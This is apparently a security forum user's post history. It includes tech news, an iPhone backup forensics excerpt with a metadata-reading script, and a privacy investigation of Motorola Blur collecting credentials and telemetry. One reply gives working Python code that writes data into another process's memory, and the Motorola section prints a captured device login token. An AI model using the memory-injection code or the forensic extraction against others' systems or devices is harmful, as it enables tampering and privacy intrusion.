Nytro

Administrators
  • Posts: 18715
  • Joined
  • Last visited
  • Days Won: 701

Everything posted by Nytro

1. [h=3]Microsoft to patch Six critical Remote Code Execution vulnerabilities this Tuesday[/h] Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013

Microsoft has announced the Patch Tuesday bulletins for July, seven in total. Of these, one addresses an important kernel privilege-escalation flaw and six address critical Remote Code Execution vulnerabilities. The patches will address vulnerabilities in Microsoft Windows, the .NET Framework and Silverlight, and will apply to all versions of Internet Explorer from IE6 on Windows XP to IE10 on Windows 8.

Often targeted by attackers to perform drive-by malware download attacks, remote code execution flaws allow an attacker to crash an application and launch malware payloads, often without any sort of notification or interaction from the user.

The Windows 8 maker is also patching a kernel vulnerability disclosed at the beginning of June by Google researcher Tavis Ormandy. The issue lies in the Windows kernel's EPATHOBJ::pprFlattenRec function (CVE-2013-3660), and after Ormandy released the exploit code, a Metasploit module was developed to exploit the bug.

The company is planning to release the update on 9 July. As usual, all fixes will be delivered via the integrated Windows Update, so no user interaction is needed.

Source: Microsoft to patch Six critical Remote Code Execution vulnerabilities this Tuesday - The Hacker News
2. [h=4]Following revelations about NSA surveillance, will people rush to download security and privacy software?[/h]

As the U.S. government continues to pursue former NSA contractor Edward Snowden for leaking some of the country’s most sensitive intelligence secrets, the debate over federal surveillance seems to have abated somewhat—despite Snowden’s stated wish for his revelations to spark transformative and wide-ranging debate, it doesn’t seem as if anyone’s taking to the streets to protest the NSA’s reported monitoring of Americans’ emails and phone-call metadata.

But that doesn’t mean privacy is dead: even before the NSA story broke, more and more companies were producing apps designed to eradicate and obfuscate user data, guarding sensitive communications from prying eyes. Late last year, for example, startup Silent Circle launched software tools for mobile devices to encrypt data while in transit, including PGP email (interoperable with external email clients) and secure video chat; its Burn Notice feature can erase messages and files after a few seconds. In December 2012, Facebook launched Poke, which nukes pictures, text and video after a predetermined amount of time. Poke was the social network’s response to the popular Snapchat, which gives images the ability to self-destruct.

On the enterprise side of the equation, there’s Voltage Security, with a variety of encryption and tokenization tools; Liaison, which traffics in communications and transaction encryption; and, for database security, Application Security. In a recent email to Slashdot, the Electronic Frontier Foundation (EFF) also recommended that the security-conscious consider Tor, HTTPS (Hypertext Transfer Protocol Secure), and host-proof cryptographic platforms such as SpiderOak as methods of locking down sensitive data and communications.

Will the recent revelations about the NSA lead to a spike in demand for sophisticated privacy software, leading to a glut of new apps that vaporize or encrypt data? Will privacy become a hot new segment for developers and startups?

Americans are certainly concerned about privacy. In September 2012, the Pew Research Center’s Internet & American Life Project released a poll suggesting that more than 50 percent of smartphone users had decided not to install a particular app because of concerns over how the software stored and shared personal data. Other surveys have indicated similar worries over sanctity of user data.

However, individual privacy concerns might not be driving investment in privacy and security software—concern over sophisticated hacking of corporate and governmental databases, and the resulting theft of valuable intellectual property, has been powering an uptick in security-related investment since at least early 2012. Tech companies might not care overmuch about your personal data—indeed, shielding your personal data prevents many IT giants from selling ads against it—but they will respond to deep-pocketed businesses’ need for hardened communications and digital storage.

Ultimately, business will be the driver for security and privacy software. It’s just not an exciting topic for most people, who will rush to download the latest iteration of Instagram or Plants vs. Zombies, but who often throw up their hands and profess ignorance when asked about how they lock down their data. Those sophisticated enough—or paranoid enough—will continue to seek out solutions.
But it’s unlikely that privacy is poised to become the next explosive growth opportunity, despite the current headlines.

Source: Is Privacy the Next Big IT Industry?
3. Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest

[Lhasa, China, July 2, 2013]: Huawei, a leading global information and communications technology (ICT) solutions provider, today announced the successful deployment with China Mobile of 4G coverage atop Mount Everest, 5,200 meters above sea level. At a June 11 ceremony marking the launch of the service, China Mobile demonstrated a series of new 4G technologies to more than 200 guests, including live HD video streaming from a Mount Everest base camp to the event venue. Huawei has already delivered 4G solutions to other parts of the region, including EPC, integrated equipment rooms, BTS, microwave transmission and 4G devices.

In 2007, Huawei worked with China Mobile and others to realize GSM coverage on Mount Everest to ensure mountain climber safety and to prepare for a leg of the 2008 Olympic Games torch relay. Huawei's GSM base stations at the Mount Everest base camp have operated smoothly ever since and continue to provide visitors with mobile services.

David Wang, President of Huawei Wireless Networks, said: "Bringing 4G to Mount Everest marks an important milestone in global LTE TDD development. We are very excited to make this possible, and look forward to working with more operators worldwide to bring high-speed mobile broadband services anytime and anywhere."

By May 2013, Huawei had deployed LTE TDD solutions for nearly 40 operators in Asia, the Middle East, North America, South America, Western Europe, Russia and Africa.

Source: Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest - About Huawei
4. Penetration Testing for iPhone Applications

iPhone forensics can be performed on the backups made by iTunes or directly on the live device. A previous article on iPhone forensics detailed the forensic techniques and the technical challenges involved in performing live device forensics. Forensic analysis on a live device reboots the phone and may alter the information stored on the device. In critical cases, forensic examiners rely on analyzing the iPhone logical backups acquired through iTunes. iTunes uses the AFC (Apple File Connection) protocol to take the backup, and the backup process does not modify anything on the iPhone except the escrow key records. This article explains the technical procedure and challenges involved in extracting data and artifacts from iPhone backups.

Understanding forensic techniques for iTunes backups is also useful in cases where we get physical access to the suspect's computer instead of the iPhone directly. When a computer is used to sync with the iPhone, most of the information on the iPhone is likely to be backed up onto the computer. So, gaining access to the computer's file system will also give access to the mobile device's data.

Note: an iPhone 4 GSM model with iOS 5.0.1 is used for the demos. Backups shown in the article are captured using iTunes 10.6.

Goal: extracting data and artifacts from the backup without altering any information.

Researchers at Sogeti Labs have released open source forensic tools (with support for iOS 5) to read normal and encrypted iTunes backups. Below are the details outlining their research and an overview of how the backup recovery tools are used.

Backups: with iOS 5, data stored on the iPhone can be backed up to a computer with iTunes or to cloud-based storage with iCloud. This article briefly covers iCloud backups and provides a deep analysis of iTunes backups.

[...]

iPhone Forensics – Analysis of iOS 5 backups : Part 1
iPhone Forensics – Analysis of iOS 5 backups : Part 2
Penetration Testing for iPhone Applications – Part 3
Penetration Testing for iPhone Applications – Part 4
Penetration Testing for iPhone Applications – Part 5
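As a small illustration of how much is readable in an unencrypted iTunes backup before any dedicated forensic tooling is involved, here is a minimal Python sketch. The default backup paths and plist key names are assumptions based on the usual iTunes backup layout, not something taken from the article; it enumerates local backup folders and prints basic metadata from each backup's Info.plist and Manifest.plist:

# Minimal sketch: enumerate local iTunes backups and print basic metadata.
# Assumes the iTunes-era layout (Info.plist / Manifest.plist in each backup folder);
# the paths below are the usual default locations on macOS and Windows.
import os
import plistlib

CANDIDATE_DIRS = [
    os.path.expanduser("~/Library/Application Support/MobileSync/Backup"),                   # macOS
    os.path.join(os.environ.get("APPDATA", ""), "Apple Computer", "MobileSync", "Backup"),   # Windows
]

def load_plist(path):
    with open(path, "rb") as f:
        return plistlib.load(f)   # handles both XML and binary plists

for base in CANDIDATE_DIRS:
    if not os.path.isdir(base):
        continue
    for entry in sorted(os.listdir(base)):
        backup_dir = os.path.join(base, entry)
        info_path = os.path.join(backup_dir, "Info.plist")
        manifest_path = os.path.join(backup_dir, "Manifest.plist")
        if not os.path.isfile(info_path):
            continue
        info = load_plist(info_path)
        print("Backup:", entry)
        print("  Device name :", info.get("Device Name"))
        print("  Product     :", info.get("Product Type"))
        print("  iOS version :", info.get("Product Version"))
        print("  Last backup :", info.get("Last Backup Date"))
        if os.path.isfile(manifest_path):
            manifest = load_plist(manifest_path)
            print("  Encrypted   :", bool(manifest.get("IsEncrypted")))

Running this against a machine that has synced with the suspect device is the "physical access to the computer" scenario described above: the metadata alone already identifies the device, its owner-assigned name and the last backup date.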
5. 1. Is this a kind of Kickstarter where the investment is $500? 2. Of those $500, how much goes to the programmer? Or is the person's work not considered "part of the project"? 3. Who holds the copyright for the project if it wins? 4. After a project wins, what happens next? How does it get developed? These are just a few questions to make sure everything is in order.
6. A detailed tutorial on how this works would be nice.
7. Yes, the data can be modified. The most practical approach is to allocate memory in the target process (VirtualAllocEx), place the modified data in that buffer, and then have the intercepted call use the new data (the pointer you allocated).
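As a rough illustration of that allocate-and-write step, here is a minimal Python/ctypes sketch against the Win32 API. The PID and payload are placeholders, and redirecting the intercepted call to the new buffer is a separate step that depends on how the call is hooked:

# Minimal sketch (Windows only): allocate a buffer in another process and copy
# replacement data into it with VirtualAllocEx / WriteProcessMemory.
import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.OpenProcess.restype = wintypes.HANDLE
kernel32.OpenProcess.argtypes = (wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
kernel32.VirtualAllocEx.restype = wintypes.LPVOID      # keep 64-bit pointers intact
kernel32.VirtualAllocEx.argtypes = (wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t,
                                    wintypes.DWORD, wintypes.DWORD)
kernel32.WriteProcessMemory.argtypes = (wintypes.HANDLE, wintypes.LPVOID, wintypes.LPCVOID,
                                        ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t))

PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_READWRITE = 0x04

pid = 1234                       # placeholder: PID of the target process
payload = b"modified data\x00"   # placeholder: the replacement bytes

handle = kernel32.OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, False, pid)
if not handle:
    raise ctypes.WinError(ctypes.get_last_error())

# Allocate a buffer inside the target process...
remote_buf = kernel32.VirtualAllocEx(handle, None, len(payload),
                                     MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)
if not remote_buf:
    raise ctypes.WinError(ctypes.get_last_error())

# ...and copy the modified data into it.
written = ctypes.c_size_t(0)
if not kernel32.WriteProcessMemory(handle, remote_buf, payload, len(payload),
                                   ctypes.byref(written)):
    raise ctypes.WinError(ctypes.get_last_error())

print("buffer at %#x, %d bytes written" % (remote_buf, written.value))
# The hooked call is then pointed at remote_buf instead of the original data.
kernel32.CloseHandle(handle)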
8. Motorola Is Listening
Article by Ben Lincoln

In June of 2013, I made an interesting discovery about the Android phone (a Motorola Droid X2) which I was using at the time: it was silently sending a considerable amount of sensitive information to Motorola, and to compound the problem, a great deal of it was sent over an unencrypted HTTP channel. If you're in a hurry, you can skip straight to the Analysis - email, ActiveSync, and social networking section - that's where the most sensitive information (e.g. email/social network account passwords) is discussed.

Technical notes

The screenshots and other data in this article are more heavily redacted than I would prefer in the interest of full disclosure and supporting evidence. There are several reasons for this:

- There is a considerable amount of binary, hex-encoded, and base64-encoded data mixed in with the traffic. As I have not performed a full reverse-engineering of the data, it's hard for me to know if any of these values are actually sensitive at this time, or in the future when someone more thoroughly decodes the protocol.
- My employer reminds its employees that publicly identifying themselves as employees of that organization places certain responsibilities on them. I do not speak for my employer, so all information that would indicate who that employer is has been removed.
- I would rather not expose my personal information more than Motorola has already.

Discovery

I was using my personal phone at work to do some testing related to Microsoft Exchange ActiveSync. In order to monitor the traffic, I had configured my phone to proxy all HTTP and HTTPS traffic through Burp Suite Professional - an intercepting proxy that we use for penetration testing - so that I could easily view the contents of the ActiveSync communication. Looking through the proxy history, I saw frequent HTTP connections to ws-cloud112-blur.svcmot.com mixed in with the expected ActiveSync connections.

[Screenshots: ActiveSync configuration information being sent to Motorola's Blur service.]

As of 22 June, 2013, svcmot.com is a domain owned by Motorola, or more specifically:

Motorola Trademark Holdings, LLC
600 North US Highway 45
Attn: Law Department
Libertyville IL 60048 US
internic@motorola.com
+1.8475765000 Fax: +1.8475234348

I was quickly able to determine that the connections to Motorola were triggered every time I updated the ActiveSync configuration on my phone, and that the unencrypted HTTP traffic contained the following data:

- The DNS name of the ActiveSync server (only sent when the configuration is first created).
- The domain name and user ID I specified for authentication.
- The full email address of the account.
- The name of the connection.

As I looked through more of the proxy history, I could see less-frequent connections in which larger chunks of data were sent - for example, a list of all the application shortcuts and widgets on my phone's home screen(s).
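For anyone who wants to reproduce this kind of passive observation without a commercial proxy, a minimal mitmproxy addon along the following lines will log every request the phone makes to Motorola's Blur hosts and flag whether it travelled over plain HTTP. mitmproxy is my own substitution here - the author used Burp Suite Professional and later OWASP ZAP - and only the svcmot.com domain is taken from the traffic described above:

# blur_watch.py - minimal mitmproxy addon sketch: log requests to *.svcmot.com
# and flag those sent over unencrypted HTTP.
# Run with:  mitmproxy -s blur_watch.py   (with the phone's wifi proxy pointed at mitmproxy)
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    host = flow.request.pretty_host
    if host.endswith("svcmot.com"):
        transport = "PLAINTEXT HTTP" if flow.request.scheme == "http" else "https"
        print(f"[blur] {transport:14s} {flow.request.method} {flow.request.pretty_url}")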
Analysis - email, ActiveSync, and social networking

I decided to try setting up each of the other account types that the system would allow me to, and find out what was captured.

Facebook and Twitter

For both of these services, the email address and password for the account are sent to Motorola. Both services support a mechanism (oAuth) explicitly intended to make this unnecessary, but Motorola does not use that more-secure mechanism. The password is only sent over HTTPS, so at least it can't be easily intercepted by most third parties. Most subsequent connectivity to both services (other than downloading images) is proxied through Motorola's system on the internet using unencrypted HTTP, so Motorola and anyone running a network capture can easily see who your friends/contacts are (including your friends' email addresses), what posts you're reading and writing, and so on. They'll also get a list of which images you're viewing, even though the actual image download comes directly from the source.

[Screenshots: Facebook and Twitter data sent to Motorola's Blur service - Facebook password; Facebook friend information; Facebook wall post by friend; Facebook wall post by self; Silent Signon; Twitter password; Twitter following information; Twitter post; Twitter posts are also read through Blur. You know your software is trustworthy and has nothing to hide when it has a function called "silent signon".]

Photobucket and Picasa

For both services, email address and password are sent to Motorola over HTTPS. For Photobucket, username and image URLs are sent over unencrypted HTTP. For Picasa, email address, display name, friend information, and image URLs are sent over unencrypted HTTP. During my testing of Photobucket, the photo was uploaded through Motorola's system (over HTTPS).
I was not able to successfully upload a photo to Picasa, although it appeared that the same would have been true for that service.

[Screenshots: Photobucket and Picasa data sent to Motorola's Blur service - Photobucket password; Photobucket user ID and friend information; Picasa password; Picasa name and friend information.]

Photo uploads (to Facebook, Photobucket, etc.)

When uploading images, the uploaded image passes through Motorola's Blur servers, and at least some of the time is uploaded with its EXIF data intact. EXIF data is where things like GPS coordinates are stored. The full path of the original image on the device is also sent to Motorola. For example, /mnt/sdcard/dcim/Camera/2013-06-20_09-00-00_000.jpg. Android devices name phone-camera images using the time they were taken with millisecond resolution, which can almost certainly be used as a unique device identifier for your phone (how many other people were taking a picture at exactly that millisecond?), assuming you leave the original photo on your phone.

[Screenshots: Data sent to Motorola's Blur service when uploading photos - Full local path; EXIF data; Service username and tags.]

Youtube

Email address and password are sent to Motorola over HTTPS. The email address is also sent to Motorola over unencrypted HTTP, along with some other data that I haven't deciphered. I didn't have time to create and upload a video, so I'm not sure what else might be sent.
[Screenshots: Youtube data sent to Motorola's Blur service - Youtube password; Email address.]

Exchange ActiveSync

Domain name, username, email address, and name of the connection are sent over unencrypted HTTP. When a new connection is created, the Exchange ActiveSync server's DNS name is also sent.

[Screenshot: Exchange ActiveSync data sent to Motorola's Blur service - EAS initial setup.]

IMAP/POP3 email

Email address, inbound/outbound server names, and the name of the connection are sent over unencrypted HTTP. There is a lot of other encoded/encrypted data included which I haven't deciphered.

[Screenshot: IMAP account data sent to Motorola's Blur service - IMAP configuration. One of the few screenshots I can leave some of the important details visible in - in this case, because the account in question is already on every spam list in the world.]

Yahoo Mail

Email address is sent over unencrypted HTTP. This type of account seems to be handled in at least sort of the correct way by Motorola's software, in that a request is made for an access token, and as far as I can tell, the actual account password is never sent to Motorola.
[Screenshot: Yahoo Mail address sent to Motorola's Blur service.]

Flickr

Similar to the Yahoo Mail results, but actually one step better - an explicit Flickr prompt appears indicating what permissions Motorola's system is asking for on behalf of the user.

[Screenshot: Flickr permission screen. The Flickr integration behaves the way every other part of Motorola's Blur service should.]

GMail/Google

Interestingly, no data seemed to be sent to Motorola about this type of account. Unfortunately, if anyone adds a Youtube or Picasa account, they've sent their GMail/Google+ credentials to Motorola anyway. Also interestingly, while testing Picasa and/or Youtube integration, Motorola's methods of authenticating actually tripped Google's suspicious activity alarm. Looking up the source IP in ARIN confirmed the connection was coming from Motorola.

[Screenshots: "Google: on guard against suspicious vendors" - Suspicious activity detected; Source of the suspicious activity confirmed.]

Firefox sync

No data seems to pass through Motorola's servers.

News / RSS

RSS feeds that are subscribed to using the built-in News application are proxied through Motorola's servers over unencrypted HTTP.
[Screenshot: RSS / News sync data sent to Motorola's Blur service.]

Other data

Every few minutes, my phone sends Motorola a detailed description of my home screen/workspace configuration - all of the shortcuts and widgets I have on it.

[Screenshots: Home screen configuration and other data sent to Motorola's Blur service - Home screen configuration; Universal account IDs. "Universal account IDs"? Is that why I only see some data sent the very first time I configure a particular account on my phone?]

Analysis - "check-in" data

As I was looking through the data I've already mentioned, I noticed chunks of "check-in" data uploaded in a binary format, and I thought I'd see if it was some sort of standard compressed format. As it turns out, it is - the 0x1F8B highlighted below is the header for a block of gzip-compressed data.

[Screenshot: GZip compressed-data header (0x1F8B) embedded in check-in data.]

The data contains what are essentially debug-level log entries from the device. The battery drain and bandwidth use from having the phone set up like this must be unbelievable. Most of the data that's uploaded is harmless or low-risk on its own - use statistics, and so on. However, this is another mechanism by which Motorola's servers are collecting information like account names/email addresses, and the sheer volume and variety of other data makes me concerned that Motorola's staff apparently care so much about how I'm using my phone. If this were a corporate-owned device, I would expect the owning corporation to have this level of system data collection enabled, but it concerns me that it's being silently collected from my personal device, and that there is no way to disable it.

Information that is definitely being collected

- The IMEI and IMSI of the phone.
  These are referred to as MEID and MIN in the phone's UI and on the label in the battery compartment, but IMEI and IMSI in the logs. I believe these two values are all that's needed to clone a phone, if someone were to intercept the traffic.
- The phone number of the phone, and carrier information (e.g. Verizon).
- The barcode from inside the battery compartment.
- Applications included with the device as well as installed by the user.
- Statistics about how those applications are used (e.g. how much data each one has sent and received).
- Phone call and text message statistics. For example, how many calls have been received or missed.
- Bluetooth device pairing and unpairing, including detailed information about those devices.
- Email addresses/usernames for accounts configured on the device.
- Contact statistics (e.g. how many contacts are synced from Google, how many Facebook users are friends of the account I've configured on the device).
- Device-level event logs (these are sent to Google as well by a Google-developed check-in mechanism).
- Debugging/troubleshooting information about most activities the phone engages in.
- Signal strength statistics and data use for each type of radio included in the device. For example, bytes sent/received via 3G versus wifi.
- Stack memory and register dumps related to applications which have crashed.
- For Exchange ActiveSync setup, the server name and email address, as well as the details of the security policy enforced by that EAS server.

Information that may be being collected

The terms-of-use/privacy policy for the Blur service (whether you know you're using it or not) explicitly specifies that location information (e.g. GPS coordinates) may be collected (see "Speaking of that privacy policy...", below). I have not seen this in the data I've intercepted. This may be due to it being represented in a non-obvious format, or it may only be collected under certain conditions, or it may only be collected by newer devices than my 2-year-old Droid X2.

While I have no conclusive evidence, I did notice while adding and removing accounts from my phone that the account ID number for a newly-added account is always higher than that for any accounts that existed previously on the device, even if those accounts have been deleted. This implies to me that Motorola's Blur service may be storing information about the accounts I've "deleted" even though they're no longer visible to me. This seems even more likely given the references in the communication to "universalAccountIds" and "knownAccountIds" referenced by GUID/UUID-like values.
[Screenshots: Check-in data being sent to Motorola - Application use stats; Basic hardware properties; Bluetooth headset use-tracking; Data use, SMS text, contact, and CPU stats; Label in the battery compartment of my phone; BlurID, IMEI and barcode (from label), IMSI and phone number; EAS setup information; EAS policy elements; Email and Disk Stats; Event logs (these are also captured by Google); Image upload bug; Logging of newly-installed applications; Missed calls; I told you it was syncing every nine minutes!; Possible client-side SQL injection vulnerability; Radio and per-application stats (e.g. CPU use by app); Register and stack memory dump; Sync App IDs: 10, 31, 80; Sync App IDs: 40, 70, 20, 2, 60, and 5; System panic auto-reboot. The "sync app ID" information will become more important in the section about XMPP. The system panic message has all of the regular boot information as well as the reason for the OS auto-reboot (in my case, apparently there is a problem with the modem).]

Analysis - Jabber / XMPP stream communication

In some of the check-in logs, I saw entries that read e.g.:

XMPPConnection: Preparing to connect user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222
XMPPConnectionManager I:onConfigurationUpdate: entered
XMPPConnectionManager I:onConfigurationUpdate: exiting
WSBase I:mother told us it's okay to retry the waiting requests: 0
NormalAsyncConnection I:Connected local addr: 192.168.253.10/192.168.253.10:60737 to remote addr: jabber-cloud112-blur.svcmot.com/69.10.176.46:5222
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 212 bytes of data with 0 bytes remaining.
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 202 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 262 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 78 bytes of data with 0 bytes remaining.
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 1448 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 2896 bytes into buffer
XMPPConnection I:Finished connecting user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222

By running a network capture, I was able to confirm that my phone was regularly attempting this type of connection. However, it was encrypted using TLS, so I couldn't see the content of the communication at first. The existence of this mechanism made me extremely curious. Why did Motorola need yet another communication channel for my phone to talk to them over? Why were they using a protocol intended for instant messaging/chat? The whole thing sounded very much like a botnet (botnets often use IRC in this way) to me.

Intercepting these communications ended up being much more work than I expected. XMPP is an XML-based protocol, and cannot be proxied by an HTTP/HTTPS proxy, so using Burp Suite or ZAP was out. My first thought was to use Mallory, an intercepting transparent proxy that I learned about in the outstanding SANS SEC 642 class back in March of 2013. Mallory is a relatively new tool, and is somewhat finicky to get set up, but I learned a lot doing so.
Unfortunately, XMPP is not a protocol that Mallory can intercept as of this writing. The VM that I built to run Mallory on still proved useful in this case, as I was eventually able to hack together a custom XMPP man-in-the-middle exploit and view the contents of the traffic. If you'd like to know more about the details, they're in the Steps to reproduce - XMPP communication channel section further down this page.

This channel is at least part of the Motorola Blur command-and-control mechanism. I haven't seen enough distinct traffic pass through it to have a good idea of the full extent of its capabilities, but I know that:

- The XMPP/Jabber protocol is re-purposed for command-and-control use. For example, certain types of message are sent using the field normally used for "presence" status in IM.
- The values exchanged in the presence fields appear to be very short (five-character) base64-encoded binary data, followed by a dash, and then a sequence number. For example, 4eTO3-52, Ugs6j-10, or t2bcA-0. The base64 value appears to be selected at boot. The sequence number is incremented differently based on criteria I don't understand (yet), but the most common step I've seen is +4.
- As long as the channel is open, the phone will check in with Motorola every nine minutes.
- At least one type of Motorola-to-phone command exists: a trigger to update software by ID number. At least three such ID numbers exist: 31, 40, and 70 (see the table below). Each of these triggers an HTTP POST request to the blur-services-1.0/ws/sync API method seen in the previous section, and the same IDs are logged in the check-in data.
- The stream token and username passed to the service are the "blurid" value (represented as a decimal number) which shows up in various places in the other traffic between the phone and Motorola.

ID | Name                     | Purpose                                                                         | Data Format | Observed In Testing?
2  | BlurSettingsSyncHandler  | Unknown                                                                         | JSON        | No
5  | BlurSetupSyncHandler     | Unverified - called when a new type of sync needs to be added?                  | gpb         | Yes
10 | BlurContactsSyncHandler  | Syncs contact information (e.g. Google account contacts)                        | gpb         | No
20 | SNMailSyncHandler        | Unverified - probably syncs private messages from social networking sites       | gpb         | No
31 | StatusSyncHandler        | Syncs current status/most-recent-post information from social networking sites  | gpb         | Yes
40 | BlurSNFriendsSyncHandler | Syncs friend information from social networking sites                           | gpb         | Yes
50 | NewsRetrievalService     | Syncs news feeds set up in the built-in Motorola app                            | gpb         | Yes
60 | AdminFlunkySyncHandler   | Unverified - sounds like some sort of remote-support functionality              | gpb         | No
70 | FeedReceiverService      | Unknown                                                                         | gpb         | Yes
80 | SNCommentsSyncHandler    | Syncs status/comment information from social networking sites                   | gpb         | Yes

The "gpb" data format is how that type of binary encoding is referred to internally by the client logs. I believe it is similar (possibly identical) to Google's "protocol buffer" system.

Here is an example session, including the SYNC APP command being sent by the server. (In the original article, traffic from the client is shown in red and traffic from the server in blue; here, client lines are prefixed with C: and server lines with S:.)

C: <stream:stream token="XXXXXXXXXXXXXXXX" to="jabber-cloud112-blur.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"/>
S: <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0">
S: <stream:features><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"></starttls><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features><proceed xmlns="urn:ietf:params:xml:ns:xmpp-tls"/>

[Communication after this point takes place over the encrypted channel which the client and server have negotiated.]
C: <stream:stream token="XXXXXXXXXXXXXXXX" to="xmpp.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0">
S: <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"><stream:features><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features>
C: <iq id="4eTO3-24" type="set"><query xmlns="jabber:iq:auth"><username>4503600105521277</username><password>1-d052e26d5bbb5b4adce7965e3e248a331765623714</password><resource>BlurDevice</resource></query></iq><iq id="4eTO3-25" type="get"><query xmlns="jabber:iq:roster"></query></iq><presence id="4eTO3-26"></presence>
S: <iq type="result" id="4eTO3-24"/>
S: <message xmlns="urn:xmpp:motorola:motodata" id="0J8Hc-30570875" to="XXXXXXXXXXXXXXXX@jabber01.mm211.dc2b.svcmot.com"><data xmlns="com:motorola:blur:push:data:1">{"Sync":{"APP":[{"d":"sync_app_id: 31\n","q":0}]}}</data></message>

[Screenshots: XMPP communication channel - XMPPPeek in action; App ID 31 (social networking status) sync; App ID 40 (friends) sync; App ID 50 (news) sync; App ID 80 (social networking comments and status) sync. A few examples of the sync operations triggered by the XMPP communication channel.]

While I have seen very little sensitive data being sent as a result of this mechanism, Motorola's privacy policy/terms-of-service related to this system makes me more concerned. There is literally no reason I can think of that I would want my phone to check in with Motorola every nine minutes to see if Motorola has any new instructions for it to execute. Is there some sort of remote-control capability intended for use by support staff? I know there is a device-location and remote wipe function, because those are advertised as features of Blur (apparently even if you didn't explicitly sign up for Blur).

Speaking of that privacy policy...

I honestly can't remember if I explicitly agreed to any sort of EULA when I originally set up my phone. There are numerous "terms of service" and "privacy policy" documents on the Motorola website which all seem designed to look superficially identical, but this one in particular (the one for the actual "Motorola Mobile Services" system, AKA "Blur") has a lot of content I really don't like, and which is not present in the other, similar documents on their site that are much easier to find.
For example, it specifically mentions capturing social networking credentials, as well as uploading GPS coordinates from customers' phones to Motorola. It is specific to "Motorola Mobile Services", and I know I didn't explicitly sign up for that type of account (which is probably why my phone is using a randomly-generated username and password to connect). I also know that even if I was presented with a lengthy statement which included statements about storing social media credentials, that happened when I originally bought the phone (about two years ago). Should I not have been at least reminded of this when I went to add a social networking account for the first time? Or at a bare minimum, should my phone not let me view any document I allegedly agreed to? The only reason I know of that particular TOS is because I found it referenced in a Motorola forum discussion about privacy concerns.

In any case, here are some interesting excerpts from that document (as of 22 June, 2013). All bold emphasis is mine. I am not a lawyer, and this is not legal advice.

    "Using the MOTOROLA MOBILE SERVICES software and services (MOTOROLA MOBILE SERVICES) constitutes your acceptance of the terms of the Agreement without modification. If you do not accept the terms of the Agreement, then you may not use MOTOROLA MOBILE SERVICES."

    "Motorola collects and uses certain information about you and your mobile device ... (1) your device's unique serial number ... (5) when your device experiences a software crash ... (1) use of hardware functions like the accelerometer, GPS, wireless antennas, and touchscreen; (2) wireless carrier and network information; (3) use of accessories like headsets and docks; (4) data usage ... Personal Information such as: (1) your email and social network account credentials; (2) user settings and preferences; (3) your email and social network contacts; (4) your mobile phone number; and (5) the performance of applications installed on your device. ... MOTOROLA MOBILE SERVICES will never collect the specific content of your communications or copies of your files."

The document makes a promise that the content of communications is not collected, but I have screenshots and raw data that show Facebook and Twitter messages as well as photos passing through their servers. The agreement specifies "when your device experiences a software crash", not "memory dumps taken at the time of a software crash", which are what is actually collected.

    "Motorola takes privacy protection seriously. MOTOROLA MOBILE SERVICES only collects personal information, social network profile data, and information about websites you visit if you create a MotoCast ID, use the preinstalled web browser and/or MOTOROLA MOBILE SERVICES applications and widgets like Messaging, Gallery, Music Player, Social Networking and Social Status. If you use non-Motorola applications for email, social networking, sharing content with your friends, and web browsing, then MOTOROLA MOBILE SERVICES will not collect this information. Even if you decline to use the preinstalled browser or the MOTOROLA MOBILE SERVICES applications and widgets, your device will continue to collect information about the performance of your mobile device and how you use your mobile device unless you choose to opt out."

In non-Motorola builds of Android, most/all of those components are still present, but none of them send data to Motorola.
Some people might think it was extremely deceptive to add data collection to those components but not make user-visible changes to them that mentioned this. Oh, and of course the OS is still collecting massive amounts of data even if you don't use the modified basic Android functionality.

    "MOTOROLA MOBILE SERVICES only collects and uses information about the location of your mobile device if you have enabled one or more location-based services, such as your device's GPS antenna, Google Location Services, or a carrier-provided location service. If you turn these features off in your mobile device's settings, MOTOROLA MOBILE SERVICES will not record the location of your mobile device."

So what you're saying is that all I have to do to prevent Motorola from tracking my physical location is disable core functionality on my device and leave it off permanently? Awesome! Thanks so much!

    "The security of your information is important to Motorola. When MOTOROLA MOBILE SERVICES transmits information from your mobile device to Motorola, MOTOROLA MOBILE SERVICES encrypts the transmission of that information using secure socket layer technology (SSL)."

